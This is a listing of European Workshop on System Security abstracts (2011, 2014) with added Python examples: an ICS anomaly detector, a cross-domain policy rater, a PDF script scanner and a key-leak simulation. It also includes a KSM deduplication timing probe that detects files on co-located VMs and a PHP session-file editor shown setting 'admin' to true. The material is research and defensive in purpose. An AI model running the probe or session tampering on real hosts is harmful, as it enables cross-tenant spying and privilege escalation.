European Workshop on System Security: latest publications

A connection pattern-based approach to detect network traffic anomalies in critical infrastructures
European Workshop on System Security, published 2014-04-13, DOI: 10.1145/2592791.2592792
B. Genge, Dorin Adrian Rusu, P. Haller
Abstract: Recent trends in Critical Infrastructures (CIs), e.g., power plants and energy smart grids, have shown an increased use of commodity, off-the-shelf Information and Communication Technologies (ICT) hardware and software. Although this has enabled the implementation of a broad palette of new features, the pervasive use of ICT, especially within the core of CIs, i.e., in Industrial Control Systems (ICSs), has attracted a new class of attacks in which cyber disturbances propagate to the physical dimension of CIs. To ensure more effective detection of cyber attacks against the ICS of CIs, we have developed SPEAR, a systematic approach that automatically configures anomaly detection engines to detect attacks that violate connection patterns specific to ICSs. The approach is validated by experimental scenarios including traffic traces from real industrial equipment and real malware (Stuxnet).
Citations: 32

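The detection idea the abstract describes, as an added example that is not the SPEAR code: ICS traffic is highly regular, so a detector can learn the set of (source, destination, protocol, port) tuples seen in a clean window and alert on any flow outside it, naming which part of the tuple is new. The hosts, ports and flow-record format are constructed for this example.

```python
"""Connection-pattern whitelist detector for ICS traffic (added example).

Learns the (src, dst, proto, dport) tuples seen in a clean training window
and reports any later flow that violates a learned pattern, together with
which element of the tuple is unseen. Hosts, ports and the flow-record
format are constructed for the example; this is not the paper's code.
"""
from typing import Iterable, List, NamedTuple, Set


class Flow(NamedTuple):
    src: str
    dst: str
    proto: str
    dport: int


def parse_flow(line: str) -> Flow:
    """Parse one 'src dst proto dport' record (constructed log format)."""
    src, dst, proto, dport = line.split()
    return Flow(src, dst, proto.lower(), int(dport))


class ConnectionPatternDetector:
    """Whitelist detector: every tuple outside the learned set is an alert."""

    def __init__(self) -> None:
        self.patterns: Set[Flow] = set()

    def learn(self, flows: Iterable[Flow]) -> None:
        self.patterns.update(flows)

    def is_anomalous(self, flow: Flow) -> bool:
        return flow not in self.patterns

    def explain(self, flow: Flow) -> str:
        """Say which element of the tuple was never seen in training."""
        if not self.is_anomalous(flow):
            return "known pattern"
        hosts = {f.src for f in self.patterns} | {f.dst for f in self.patterns}
        if flow.src not in hosts:
            return f"unknown source host {flow.src}"
        if flow.dst not in hosts:
            return f"unknown destination host {flow.dst}"
        services = {(f.dst, f.proto, f.dport) for f in self.patterns}
        if (flow.dst, flow.proto, flow.dport) not in services:
            return f"new service {flow.proto}/{flow.dport} on {flow.dst}"
        return f"new peer {flow.src} for {flow.proto}/{flow.dport} on {flow.dst}"


# Constructed clean traffic: an HMI (.10) and an engineering workstation (.30)
# poll a PLC (.20) over Modbus/TCP, and the HMI writes to a historian (.40).
TRAINING_FLOWS = [
    "10.0.0.10 10.0.0.20 tcp 502",
    "10.0.0.30 10.0.0.20 tcp 502",
    "10.0.0.10 10.0.0.40 tcp 1433",
]


def build_detector(lines: Iterable[str] = TRAINING_FLOWS) -> ConnectionPatternDetector:
    det = ConnectionPatternDetector()
    det.learn(parse_flow(line) for line in lines)
    return det


def scan(det: ConnectionPatternDetector, lines: Iterable[str]) -> List[str]:
    """Return one alert string per anomalous flow, in input order."""
    alerts = []
    for line in lines:
        flow = parse_flow(line)
        if det.is_anomalous(flow):
            alerts.append(f"ALERT {line}: {det.explain(flow)}")
    return alerts


if __name__ == "__main__":
    det = build_detector()
    # Constructed test window: one normal poll plus three deviations.
    for alert in scan(det, [
        "10.0.0.10 10.0.0.20 tcp 502",
        "10.0.0.10 10.0.0.20 tcp 445",   # SMB towards the PLC: lateral movement
        "10.0.0.99 10.0.0.20 tcp 502",   # Modbus from a host never seen before
        "10.0.0.40 10.0.0.20 tcp 502",   # the historian suddenly talks Modbus to the PLC
    ]):
        print(alert)
```

The whitelist is only as good as the training window: it must cover maintenance traffic (engineering-station sessions, firmware updates) or those become false positives, and the learned set should be reviewed by someone who knows the plant before enforcement.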
Improving Mac OS X security through gray box fuzzing technique
European Workshop on System Security, published 2014-04-13, DOI: 10.1145/2592791.2592793
S. Mazzone, M. Pagnozzi, Aristide Fattori, Alessandro Reina, A. Lanzi, D. Bruschi
Abstract: The kernel is the core of any operating system, and its security is of vital importance. A vulnerability in any of its parts compromises the whole system security model. Unprivileged users that find such vulnerabilities can easily crash the attacked system, or obtain administration privileges. In this paper we propose LynxFuzzer, a framework to test kernel extensions, i.e., the dynamically loadable components of the Mac OS X kernel. To overcome the challenges posed by interacting with kernel-level software, LynxFuzzer includes a bare-metal hardware-assisted hypervisor that allows seamless inspection of the state of a running kernel and its components. We implemented and evaluated LynxFuzzer on Mac OS X Mountain Lion and obtained unexpected results: we identified 6 bugs in the 17 kernel extensions we tested, thus proving the usefulness and effectiveness of our framework.
Citations: 5

On measuring the impact of DDoS botnets
European Workshop on System Security, published 2014-04-13, DOI: 10.1145/2592791.2592794
Arne Welzel, C. Rossow, H. Bos
Abstract: Miscreants use DDoS botnets to attack a victim via a large number of malware-infected hosts, combining the bandwidth of the individual PCs. Such botnets thus have a high potential to render targeted services unavailable. However, the actual impact of attacks by DDoS botnets has never been evaluated. In this paper, we monitor the C&C servers of 14 DirtJumper and Yoddos botnets and record the DDoS targets of these networks. We then evaluate the availability of the DDoS victims, using a variety of measurements such as TCP response times and analysis of the HTTP content. We show that more than 65% of the victims are severely affected by the DDoS attacks, while a few DDoS attacks likely failed.
Citations: 37

Memory deduplication as a threat to the guest OS
European Workshop on System Security, published 2011-04-10, DOI: 10.1145/1972551.1972552
K. Suzaki, K. Iijima, T. Yagi, Cyrille Artho
Abstract: Memory deduplication shares memory pages with identical content and reduces the consumption of physical memory. It is effective in environments that run many virtual machines with the same operating system. Memory deduplication, however, is vulnerable to memory disclosure attacks, which reveal the existence of an application or file on another virtual machine. Such an attack takes advantage of the difference in write access times on deduplicated memory pages that are re-created by copy-on-write. In our experiments on KSM (kernel samepage merging) with the KVM virtual machine, the attack could detect the existence of sshd and apache2 on Linux, and IE6 and Firefox on Windows XP. It could also detect a file downloaded with the Firefox browser. We describe the attack mechanism in this paper and also discuss countermeasures against the attack.
Citations: 130

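The measurement behind the attack, as an added example that is not the paper's code: a page that KSM has merged is mapped read-only, so the first write to it takes a copy-on-write fault and is measurably slower than a write to a page nobody else holds. The probe below fills one buffer with consecutive pages of a file whose presence on a co-located VM is to be tested (the target path is a hypothetical command-line argument) and a control buffer with random pages that can never be merged, then compares first-write latencies. The decision rule (median ratio) is this example's own.

```python
"""Write-latency probe for memory deduplication (added example, not the
paper's code). Needs KSM enabled on the host and enough waiting time for
the scanner to merge the probe pages; the latency functions themselves run
anywhere, which is what the inline checks exercise."""
import mmap
import os
import statistics
import time
from typing import List, Tuple

PAGE = mmap.PAGESIZE


def fill_buffers(template: bytes, npages: int) -> Tuple[mmap.mmap, mmap.mmap]:
    """Probe buffer: one template page per mmap page, so each probe page can
    be merged with the same page in another VM. Control buffer: random
    content per page, so nothing can merge with it."""
    probe = mmap.mmap(-1, npages * PAGE)       # anonymous private mapping
    control = mmap.mmap(-1, npages * PAGE)
    for i in range(npages):
        page = template[i * PAGE:(i + 1) * PAGE].ljust(PAGE, b"\0")
        probe[i * PAGE:(i + 1) * PAGE] = page
        control[i * PAGE:(i + 1) * PAGE] = os.urandom(PAGE)
    return probe, control


def first_write_latencies_ns(buf: mmap.mmap, npages: int) -> List[int]:
    """Time the first write to each page. A deduplicated page pays a
    copy-on-write fault here; an exclusive page does not."""
    latencies = []
    for i in range(npages):
        off = i * PAGE
        t0 = time.perf_counter_ns()
        buf[off] = 0x41
        latencies.append(time.perf_counter_ns() - t0)
    return latencies


def looks_deduplicated(probe_ns: List[int], control_ns: List[int],
                       factor: float = 2.0) -> bool:
    """Decision rule (assumption of this example): the probe pages were
    merged if their median first-write latency exceeds the control's by
    `factor`. Medians absorb the odd interrupt or TLB miss."""
    return statistics.median(probe_ns) > factor * statistics.median(control_ns)


if __name__ == "__main__":
    import sys
    # Hypothetical target: the binary whose presence on a neighbour we test.
    target = sys.argv[1] if len(sys.argv) > 1 else "/usr/sbin/sshd"
    wait_s = float(sys.argv[2]) if len(sys.argv) > 2 else 300.0
    npages = 64
    with open(target, "rb") as f:
        template = f.read(npages * PAGE)
    probe, control = fill_buffers(template, npages)
    time.sleep(wait_s)                         # give KSM time to scan and merge
    p = first_write_latencies_ns(probe, npages)
    c = first_write_latencies_ns(control, npages)
    print(f"median first write: probe {statistics.median(p)} ns, control {statistics.median(c)} ns")
    print("target pages appear to be shared with another VM" if looks_deduplicated(p, c)
          else "no deduplication signal")
```

Two caveats a practitioner will hit: all-zero pages (and other content common to every VM) merge regardless of the target, so a real probe should skip them, and the sleep must exceed the KSM scan cycle for the whole of guest memory. The same timing channel is the reason hosts that run mutually distrusting tenants disable cross-VM deduplication.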
An empirical study on the security of cross-domain policies in rich internet applications
European Workshop on System Security, published 2011-04-10, DOI: 10.1145/1972551.1972558
Georgios Kontaxis, Demetres Antoniades, Iasonas Polakis, E. Markatos
Abstract: Adobe Flash and Microsoft Silverlight are two widely adopted platforms for providing Rich Internet Applications (RIA) over the World Wide Web. The need for RIAs to retrieve content hosted on different domains, in order to enrich the user experience, led to the use of cross-domain policies by content providers. Cross-domain policies define the list of RIA hosting domains that are allowed to retrieve content from the content provider's domain. Misinterpretation or misconfiguration of the policies may give malicious RIAs the opportunity to access and handle users' private data.

In this paper we present an extensive study on the deployment and security issues of cross-domain policies on the web. Through the examination of a large set of popular and diverse (both geographically and content-wise) websites, we reveal that about 50% (more than 6,500 websites) of the websites that have adopted such policies are vulnerable to attacks. Furthermore, we find such policies in more than 50% of the top 500 websites, examined both globally and per country. Additionally, we examine local sets of e-shopping websites and find that up to 83% implement weak policies. Interestingly, we observe that the less popular a website is, the higher the probability that it will have a weak policy. Compared to previous studies there is an obvious increasing trend in the adoption of RIA but, at the same time, a decreasing trend regarding secure implementations.

Through a proof-of-concept attack implementation and a number of real-world examples, we highlight the security impact of these policy misconfigurations.
Citations: 20

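What a "weak policy" looks like in practice, as an added example that is not the paper's code: Flash Player fetches /crossdomain.xml from a content provider and lets an RIA served from any origin matched by an allow-access-from rule read that provider's responses with the user's cookies attached, so `domain="*"` hands every site on the web the user's authenticated view of the content. The classifier below parses the policy format and applies this example's own rating rules; the sample policies are constructed. (Silverlight's clientaccesspolicy.xml expresses the same grants with different element names and is not handled here.)

```python
"""Rating Flash cross-domain policy files (added example, not the paper's
tool). The weak/open heuristics are this example's own; the samples are
constructed."""
import xml.etree.ElementTree as ET
from typing import Dict, List


def classify_policy(xml_text: str, served_over_https: bool = True) -> Dict[str, object]:
    """Return {'rating': 'open' | 'weak' | 'restrictive', 'findings': [...]}.

    open        : any origin may read the content (domain="*")
    weak        : a wildcard covering a whole TLD (e.g. "*.com"), or
                  secure="false" on an HTTPS policy, which lets plain-HTTP
                  origins read HTTPS content, or arbitrary headers from anyone
    restrictive : only specific domains, or no rule at all (deny-all)
    """
    root = ET.fromstring(xml_text)   # stdlib expat does not fetch the external DTD
    if root.tag != "cross-domain-policy":
        raise ValueError("not a cross-domain-policy document")
    findings: List[str] = []
    rating = "restrictive"
    order = {"restrictive": 0, "weak": 1, "open": 2}

    def raise_to(level: str) -> None:
        nonlocal rating
        if order[level] > order[rating]:
            rating = level

    for rule in root.iter("allow-access-from"):
        domain = rule.get("domain", "")
        secure = rule.get("secure", "true").lower() != "false"
        if domain == "*":
            findings.append('allow-access-from domain="*": any site can read responses')
            raise_to("open")
        elif domain.startswith("*.") and domain[2:].count(".") == 0:
            # "*.example.com" is a normal pattern; "*.com" matches a whole TLD.
            findings.append(f"wildcard {domain} matches every site under a TLD")
            raise_to("weak")
        if served_over_https and not secure:
            findings.append(f'secure="false" for {domain}: HTTP origins may read HTTPS content')
            raise_to("weak")

    for rule in root.iter("allow-http-request-headers-from"):
        if rule.get("domain") == "*" and rule.get("headers", "") == "*":
            findings.append("any site may send arbitrary request headers")
            raise_to("weak")

    if not findings and not list(root.iter("allow-access-from")):
        findings.append("no allow-access-from rule: denies all cross-domain loads")
    return {"rating": rating, "findings": findings}


# Constructed sample policies.
OPEN_POLICY = """<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
  <allow-access-from domain="*"/>
</cross-domain-policy>"""

WEAK_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
  <allow-access-from domain="*.example.com" secure="false"/>
  <allow-access-from domain="*.com"/>
</cross-domain-policy>"""

RESTRICTIVE_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="master-only"/>
  <allow-access-from domain="app.example.com" secure="true"/>
</cross-domain-policy>"""

if __name__ == "__main__":
    for name, policy in [("open", OPEN_POLICY), ("weak", WEAK_POLICY),
                         ("restrictive", RESTRICTIVE_POLICY)]:
        result = classify_policy(policy)
        print(name, "->", result["rating"], result["findings"])
```

The fix is the restrictive form: list only the origins that actually host your RIA, keep `secure="true"` on HTTPS sites, and set `permitted-cross-domain-policies="master-only"` so a user-uploaded file elsewhere on the host cannot act as a policy.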
On passive inference attacks against physical-layer key extraction?
European Workshop on System Security, published 2011-04-10, DOI: 10.1145/1972551.1972559
Matthew Edman, A. Kiayias, B. Yener
Abstract: Physical-layer key extraction techniques attempt to derive a shared symmetric cryptographic key between two wireless devices based on the principle of channel reciprocity, which states that the signal envelope between two communicating devices is strongly correlated. A key security assumption made in previous literature is that the signal envelope observed by an adversary located more than half a wavelength away is uncorrelated with that shared between the two communicating devices; however, this assumption has yet to be rigorously evaluated in previous work on physical-layer key extraction. In this paper, we present an experimental analysis that examines the relationship between the channel measurements used to extract a symmetric key between two devices and those observed by one or more distantly located passive adversaries. We find that, contrary to previous assumptions, there does exist a strong correlation in measurements observed by adversaries located significantly more than half a wavelength away from two communicating wireless devices.

Further, we provide initial results that show the extent to which the adversary is able to leverage such correlations to infer portions of the key extracted between two devices using previously published physical-layer key extraction techniques.
Citations: 67

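Why a non-zero correlation matters, as an added simulation that is not the paper's code or data: Alice and Bob threshold a shared channel envelope into key bits, and Eve thresholds her own observation, whose correlation with theirs is the parameter rho. The noise model and the threshold quantiser are simplifications chosen for this example; the point it demonstrates is how quickly the fraction of key bits Eve reproduces climbs from 1/2 as rho leaves zero.

```python
"""Passive adversary against threshold-based physical-layer key extraction
(added simulation, not the paper's code). Alice/Bob/Eve observations,
noise levels and the quantiser are this example's assumptions."""
import random
import statistics
from typing import Dict, List, Optional, Tuple


def simulate_observations(n: int, rho: float, noise: float, seed: int
                          ) -> Tuple[List[float], List[float], List[float]]:
    """h is the reciprocal channel gain; Alice and Bob see it plus independent
    receiver noise; Eve sees a gain correlated with h by coefficient rho."""
    rng = random.Random(seed)
    h = [rng.gauss(0.0, 1.0) for _ in range(n)]
    alice = [x + rng.gauss(0.0, noise) for x in h]
    bob = [x + rng.gauss(0.0, noise) for x in h]
    eve = [rho * x + (1.0 - rho * rho) ** 0.5 * rng.gauss(0.0, 1.0) for x in h]
    return alice, bob, eve


def quantize(samples: List[float], guard: float) -> List[Optional[int]]:
    """1 above mean + guard*sd, 0 below mean - guard*sd, None inside the
    guard band (those indices are dropped during reconciliation)."""
    m = statistics.mean(samples)
    band = guard * statistics.pstdev(samples)
    return [1 if x > m + band else 0 if x < m - band else None for x in samples]


def eavesdropper_agreement(rho: float, n: int = 4000, noise: float = 0.1,
                           guard: float = 0.2, seed: int = 1) -> float:
    """Fraction of the agreed key bits that Eve's own quantised envelope
    reproduces: 0.5 means she learns nothing, values near 1 mean the key leaks."""
    alice, bob, eve = simulate_observations(n, rho, noise, seed)
    a_bits, b_bits = quantize(alice, guard), quantize(bob, guard)
    e_bits = quantize(eve, 0.0)     # Eve has nobody to reconcile with; she keeps every sample
    key_positions = [i for i in range(n)
                     if a_bits[i] is not None and a_bits[i] == b_bits[i]]
    hits = sum(1 for i in key_positions if e_bits[i] == a_bits[i])
    return hits / len(key_positions)


def leak_curve(rhos: Tuple[float, ...] = (0.0, 0.5, 0.9, 0.99)) -> Dict[float, float]:
    return {rho: eavesdropper_agreement(rho) for rho in rhos}


if __name__ == "__main__":
    for rho, frac in leak_curve().items():
        print(f"rho={rho:.2f}: Eve reproduces {frac:.1%} of the key bits")
```

Note that the leak is per bit: even at 85% agreement an attacker does not know which bits are wrong, but the key's effective entropy is far below its length, and the privacy-amplification stage of the protocol has to be sized for the measured rho rather than for the assumed zero.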
Combining static and dynamic analysis for the detection of malicious documents
European Workshop on System Security, published 2011-04-10, DOI: 10.1145/1972551.1972555
Zacharias Tzermias, Giorgos Sykiotakis, M. Polychronakis, E. Markatos
Abstract: The widespread adoption of the PDF format for document exchange has given rise to the use of PDF files as a prime vector for malware propagation. As vulnerabilities in the major PDF viewers keep surfacing, effective detection of malicious PDF documents remains an important issue. In this paper we present MDScan, a standalone malicious document scanner that combines static document analysis and dynamic code execution to detect previously unknown PDF threats. Our evaluation shows that MDScan can detect a broad range of malicious PDF documents, even when they have been extensively obfuscated.
Citations: 131

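The static half of such a scanner, as an added example that is not MDScan: walk the PDF object table, inflate FlateDecode streams, pull out every JavaScript action whether inline or reached through an indirect reference, and record the indicators that usually accompany an exploit. The dynamic half (running the extracted script in an instrumented interpreter) is out of scope here. The sample document is built inline and the indicator list is this example's own.

```python
"""Static JavaScript extraction and indicator scan for PDF files (added
example, not MDScan). Parsing is regex-based and tolerant of broken
structure on purpose: malicious files rarely follow the spec. Sample
documents are constructed inline."""
import re
import zlib
from typing import Dict, List, Tuple

OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj\b(.*?)\bendobj", re.S)
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.S)
JS_REF_RE = re.compile(rb"/JS\s*(\d+)\s+\d+\s+R")
JS_INLINE_RE = re.compile(rb"/JS\s*\((.*)\)\s*(?=/[A-Za-z]|>>)", re.S)
DOC_INDICATORS = {
    rb"/OpenAction\b": "runs an action when the document opens",
    rb"/AA\b": "additional-actions trigger (page open, form events)",
    rb"/Launch\b": "launch action (executes an external program)",
    rb"/EmbeddedFile\b": "embedded file attachment",
}
JS_INDICATORS = [b"unescape", b"eval", b"String.fromCharCode", b"util.printf", b"Collab."]


def parse_objects(pdf: bytes) -> Dict[int, Tuple[bytes, bytes]]:
    """Map object number -> (dictionary text, decoded stream or b'')."""
    objs = {}
    for m in OBJ_RE.finditer(pdf):
        body = m.group(3)
        sm = STREAM_RE.search(body)
        head = body[:sm.start()] if sm else body
        data = sm.group(1) if sm else b""
        if sm and b"/FlateDecode" in head:
            try:
                data = zlib.decompress(data)
            except zlib.error:
                pass  # corrupt or deliberately damaged stream: keep the raw bytes
        objs[int(m.group(1))] = (head, data)
    return objs


def _string_object(head: bytes) -> bytes:
    m = re.fullmatch(rb"\s*\((.*)\)\s*", head, re.S)
    return m.group(1) if m else b""


def extract_javascript(pdf: bytes) -> List[bytes]:
    """Every script reachable from a /JavaScript action dictionary."""
    objs = parse_objects(pdf)
    scripts = []
    for head, _ in objs.values():
        if b"/JavaScript" not in head:
            continue
        ref = JS_REF_RE.search(head)
        if ref:
            target = int(ref.group(1))
            if target in objs:
                t_head, t_data = objs[target]
                scripts.append(t_data or _string_object(t_head))
            continue
        inline = JS_INLINE_RE.search(head)
        if inline:
            scripts.append(inline.group(1))
    return scripts


def suspicious_indicators(pdf: bytes) -> List[str]:
    found = [desc for pat, desc in DOC_INDICATORS.items() if re.search(pat, pdf)]
    for js in extract_javascript(pdf):
        found.extend(f"script uses {tok.decode()}" for tok in JS_INDICATORS if tok in js)
        if re.search(rb"(?:%u[0-9a-fA-F]{4}){20,}", js):
            found.append("long %u-escaped blob (likely shellcode)")
    return found


def build_sample_pdf(js: bytes, compress: bool = True) -> bytes:
    """Constructed minimal PDF whose /OpenAction runs `js` from a stream object."""
    body = zlib.compress(js) if compress else js
    filt = b" /Filter /FlateDecode" if compress else b""
    return (b"%PDF-1.4\n"
            b"1 0 obj\n<< /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >>\nendobj\n"
            b"2 0 obj\n<< /Type /Pages /Kids [] /Count 0 >>\nendobj\n"
            b"3 0 obj\n<< /S /JavaScript /JS 4 0 R >>\nendobj\n"
            b"4 0 obj\n<< /Length " + str(len(body)).encode() + filt + b" >>\nstream\n"
            + body + b"\nendstream\nendobj\n"
            b"trailer\n<< /Root 1 0 R >>\n%EOF\n")


if __name__ == "__main__":
    sample = build_sample_pdf(b'var s = unescape("%u9090%u9090"); eval(s);')
    print("scripts:", extract_javascript(sample))
    print("indicators:", suspicious_indicators(sample))
```

Static extraction alone is what obfuscation defeats: a script that builds its payload with string arithmetic shows none of the tokens above, which is exactly why the paper hands the extracted code to an instrumented interpreter and watches what it does rather than what it says.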
Abusing locality in shared web hosting
European Workshop on System Security, published 2011-04-10, DOI: 10.1145/1972551.1972553
Nick Nikiforakis, W. Joosen, Martin Johns
Abstract: The increasing popularity of the World Wide Web has led more and more individuals and companies to identify the need to acquire a Web presence. The most common way of acquiring such a presence is through Web hosting companies, and the most popular hosting solution is shared Web hosting.

In this paper we investigate the workings of shared Web hosting and point out the potential lack of session isolation between domains hosted on the same physical server. We present two novel server-side attacks against session storage which target the logic of a Web application instead of specific logged-in users. Due to the lack of isolation, an attacker with a domain under his control can force arbitrary sessions onto co-located Web applications as well as inspect and edit the contents of their existing active sessions. Using these techniques, an attacker can circumvent authentication mechanisms, elevate his privileges, steal private information and conduct attacks that would otherwise be impossible. Finally, we test the applicability of our attacks against common open-source software and evaluate their effectiveness in the presence of generic server-side countermeasures.
Citations: 16

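What "inspect and edit the contents of their existing active sessions" amounts to on the most common stack, as an added example that is not the paper's code: PHP's default session handler writes each session to a file named sess_<id> under session.save_path, encoded as key|<serialized value> pairs in the same format as serialize(). When that directory is shared by every tenant of the host, any tenant who can read it sees every co-located application's session state, and any tenant who can write to it can plant or rewrite one. The decoder, encoder and directory audit below are this example's own; the session data is constructed, and the latin-1 decoding is a deliberate trick so that one byte is one character and PHP's byte-length prefixes line up.

```python
"""PHP session-file decoder/encoder and save_path audit (added example,
not the paper's code). Sample session contents are constructed."""
import os
import stat
import tempfile
from typing import Any, Dict, Tuple


def _decode(s: str, i: int) -> Tuple[Any, int]:
    """Decode one serialize()-encoded value starting at s[i]; return (value, next index)."""
    t = s[i]
    if t == "N":
        return None, i + 2
    if t in "ibd":
        end = s.index(";", i)
        raw = s[i + 2:end]
        return {"i": int, "d": float, "b": lambda v: v == "1"}[t](raw), end + 1
    if t == "s":
        colon = s.index(":", i + 2)
        n = int(s[i + 2:colon])                 # byte length, hence the latin-1 decoding
        start = colon + 2                       # skip ':"'
        return s[start:start + n], start + n + 2  # skip '";'
    if t == "a":
        colon = s.index(":", i + 2)
        n = int(s[i + 2:colon])
        j = colon + 2                           # skip ':{'
        out: Dict[Any, Any] = {}
        for _ in range(n):
            k, j = _decode(s, j)
            v, j = _decode(s, j)
            out[k] = v
        return out, j + 1                       # skip '}'
    raise ValueError(f"unsupported type {t!r} at offset {i}")


def _encode(v: Any) -> str:
    if v is None:
        return "N;"
    if isinstance(v, bool):                     # before int: bool is an int subclass
        return f"b:{int(v)};"
    if isinstance(v, int):
        return f"i:{v};"
    if isinstance(v, float):
        return f"d:{v};"
    if isinstance(v, str):
        return f's:{len(v)}:"{v}";'
    if isinstance(v, dict):
        inner = "".join(_encode(k) + _encode(x) for k, x in v.items())
        return f"a:{len(v)}:{{{inner}}}"
    raise TypeError(f"cannot encode {type(v).__name__}")


def load_session(data: bytes) -> Dict[str, Any]:
    """Parse a sess_<id> file body into a dict."""
    s = data.decode("latin-1")
    i, out = 0, {}
    while i < len(s):
        bar = s.index("|", i)
        key = s[i:bar]
        val, i = _decode(s, bar + 1)
        out[key] = val
    return out


def dump_session(session: Dict[str, Any]) -> bytes:
    return "".join(f"{k}|{_encode(v)}" for k, v in session.items()).encode("latin-1")


def audit_save_path(path: str) -> Dict[str, Any]:
    """Is the session directory reachable by other local users, and which
    session files can the current user read? The hardened layout this check
    assumes is one save_path per vhost, mode 0700, owned by that vhost's user."""
    mode = os.stat(path).st_mode
    shared = bool(mode & (stat.S_IRWXG | stat.S_IRWXO))
    readable = sorted(f for f in os.listdir(path)
                      if f.startswith("sess_") and os.access(os.path.join(path, f), os.R_OK))
    return {"path": path, "shared_with_other_users": shared, "readable_sessions": readable}


# Constructed session of a co-located shop application.
SAMPLE_SESSION = b'user|s:5:"guest";admin|b:0;cart|a:1:{i:0;s:3:"sku";}'


def make_demo_save_path(mode: int) -> str:
    """Create a throwaway save_path holding SAMPLE_SESSION, with the given mode."""
    d = tempfile.mkdtemp(prefix="php-sess-demo-")
    with open(os.path.join(d, "sess_abc123"), "wb") as f:
        f.write(SAMPLE_SESSION)
    os.chmod(d, mode)
    return d


if __name__ == "__main__":
    sess = load_session(SAMPLE_SESSION)
    print("decoded:", sess)
    sess["admin"] = True                        # what a co-tenant with write access can do
    print("rewritten:", dump_session(sess))
    print(audit_save_path(make_demo_save_path(0o777)))
```

Moving sessions out of a world-accessible /tmp is only the first of the paper's generic countermeasures; the hosting-level fix is running each tenant's PHP under its own user (per-vhost php-fpm pools or suEXEC-style setups) so that even a shared directory cannot be read across accounts.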
Attack surface reduction for commodity OS kernels: trimmed garden plants may attract less bugs
European Workshop on System Security, published 2011-04-10, DOI: 10.1145/1972551.1972557
Anil Kurmus, A. Sorniotti, R. Kapitza
Abstract: Kernel vulnerabilities are a major current practical security problem, as attested by the weaknesses and flaws found in many commodity operating system kernels in recent years. Ever-growing code size in those projects, due to the addition of new features and the reluctance to remove legacy support, indicates that this problem will remain a severe system security threat in the foreseeable future. Reactive measures such as bug fixes via code reviews and testing, while effective, can only alleviate the issue. Furthermore, common practices in system hardening often focus on complex and sometimes hard-to-achieve goals that require extensive manual intervention, such as security policies for sandboxing.

In this paper, we explore an alternative, automated and effective way of reducing the attack surface in commodity operating system kernels, which we call trimming. Trimming is a two-fold process: an initial analysis of a given system for unused kernel code sections is followed by an enforcement phase, in which the unused sections are removed or prevented from being executed. We discuss the requirements that should be reflected in the design of a trimming infrastructure, and present a lightweight and flexible implementation example for the Linux kernel using dynamic binary instrumentation as provided by kprobes.

Our evaluation shows that, in the case of a web server, we can reduce the attack surface of the kernel (in terms of the number of kernel functions accessible to unprivileged users) by about 88%.
Citations: 41

Thwarting real-time dynamic unpacking
European Workshop on System Security, published 2011-04-10, DOI: 10.1145/1972551.1972556
Leyla Bilge, A. Lanzi, D. Balzarotti
Abstract: Packing is a very popular technique for obfuscating programs, and malware in particular. In order to successfully detect packed malware, dynamic unpacking techniques have been proposed in the literature. Dynamic unpackers execute and monitor a packed program, and try to guess when the original code of the program is available unprotected in memory. The major drawback of dynamic unpackers is the performance overhead they introduce. To reduce the overhead and make it possible to perform dynamic unpacking at end hosts, researchers have proposed real-time unpackers that operate at a coarser granularity, namely OmniUnpack and Justin. In this paper, we present a simple compile-time packing algorithm that maximizes the cost of unpacking and minimizes the amount of program code that can be automatically recovered by real-time coarse-grained unpackers. The evaluation shows that real-time dynamic unpackers are totally ineffective against this algorithm.
Citations: 10